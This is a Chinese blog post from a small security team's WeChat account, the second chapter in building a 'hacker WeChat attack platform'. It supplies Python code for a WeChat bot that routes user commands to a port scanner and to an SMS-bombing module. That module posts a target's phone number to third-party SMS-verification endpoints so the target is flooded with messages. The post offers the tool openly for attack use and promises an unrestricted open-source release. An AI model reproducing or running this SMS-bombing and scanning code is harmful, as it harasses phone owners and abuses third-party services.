黑客微信攻击平台-第二章(短信攻击)

  • A+
所属分类:安全文章

版权声明:

本文首发于微信号:inn0team

此文章版权归属于inn0team所有,转载请自觉保留以上版权声明

告知:

本公众号不提供非法用途,所以有些攻击手段,公众号内将会有诸多限制。如果想打造真正没有限制的攻击平台,请自申请公众号,源代码将会在下几章发布到github。

公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。

公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。

公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。

目标:

  •  短信攻击

  • 网站扫描

  •  端口扫描

  • IP定位

  • MD5破解

  • xss平台

  • …… (有什么需要添加的,请留言)

  • (透露下,如果没有意外可能会加入手机号定位功能

关于代码:

本套代码,将会在github 开源(采用 MIT 许可协议,可放心集成于商业产品中)。

开始打造

目录:

* 代表此次修改文件
|-- run.py #启动文件
|-- wechat #微信配置目录
|---- __init__.py
|---- wechatConfig.py #微信配置验证,模块加载接口 *
|---- mode #模块目录
|------ __init__.py
|------ scanPort.py #端口扫描模块
|------ sendSMS.py #短信攻击模块 *

wechatConfig.py

#! /usr/bin/python
# -*- coding: utf-8 -*-
from flask import make_response
import hashlib
from mode import scanPort,sendSMS

def wechat_auth(token,data):
   signature = data.get('signature','')
   timestamp = data.get('timestamp','')
   nonce = data.get('nonce','')
   echostr = data.get('echostr','')
   s = [timestamp,nonce,token]
   s.sort()
   s = ''.join(s)
   if (hashlib.sha1(s).hexdigest() == signature):
       return make_response(echostr)

def wechat_mode(content):
   if content==u"攻击":
       return "G1:端口扫描nG2:短信攻击nn攻击格式:编号&目标n列如:G1&127.0.0.1n列如:G2&188****1111"
   elif  "G1&" in content:
       arr=content.split('&')
       return "你扫描的IP端口为:"+str(scanPort.init(arr[1]))
   elif  "G2&"in content:
       arr=content.split('&')
       return "系统提示:"+str(sendSMS.sendSMS(arr[1]))
   else:
       return "感谢你的留言!"

sendSMS.py:

#! /usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import urllib


#短信攻击接口1
def sendServer1(phone):
   data = {}
   data['mobile'] = phone
   #定义post的地址
   url = 'http://www.xxxxx.com/xxxx/xxxxxx'
   post_data = urllib.urlencode(data)
   #提交,发送数据
   try:
       req = urllib2.urlopen(url, post_data)
   except:
       print '异常'

#短信攻击接口2
def sendServer2(phone):
   data = {}
   data['mobile'] = phone
   #定义post的地址
   url = 'http://www.xxxxx.com/xxxx/xxxxxx'
   post_data = urllib.urlencode(data)
   #提交,发送数据
   try:
       req = urllib2.urlopen(url, post_data)
   except:
       print '异常'


def sendSMS(phone):
   sendServer1(phone)
   sendServer2(phone)
   return '发送成功!'

启动项目:

python run.py 

测试截图


黑客微信攻击平台-第二章(短信攻击)


黑客微信攻击平台-第二章(短信攻击)

inn0team只是一个正在成长的小的安全团队
微信号:inn0team
黑客微信攻击平台-第二章(短信攻击)
长按便可关注我们


本文始发于微信公众号(inn0team):黑客微信攻击平台-第二章(短信攻击)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: